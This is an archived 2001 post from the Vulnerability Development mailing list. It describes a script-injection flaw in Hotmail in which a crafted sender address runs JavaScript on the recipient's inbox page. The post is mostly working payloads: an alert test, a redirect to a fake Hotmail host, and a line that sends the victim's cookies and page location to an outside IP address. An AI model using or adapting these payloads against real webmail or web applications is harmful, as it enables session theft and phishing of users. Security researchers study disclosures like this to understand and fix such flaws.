Vulnerability Development mailing list archives
hotmail+javascript
From: ObLiviON <v_arnhem () dds nl>
Date: Mon, 10 Sep 2001 17:27:55 +0200
You can bypass the hotmail javascript 'filtering' system using the from-address. I used netscape messenger and set my email address to "a background=javascript:alert('test') @hotmail.com" (without quotes), then netscape sends it as "user"@domain. The from-address is used by hotmail as the name of the cell for the message link etc. --> From my hotmail inbox page: <td name=""a background=javascript:alert('test') "@hotmail.com"> and javascript code is executed. And its executed on the inbox page=extra fun :) --- "a background=javascript:location.href='fake.hotmail.bla.com' @hotmail.com" "a background=javascript:document.images[1].src='http://123.12.123.2/cgi-bin/bla.cgi?'+document.cookie+location.href @hotmail.com" etc... :) grtz ObLiviON
Current thread:
- hotmail+javascript ObLiviON (Sep 10)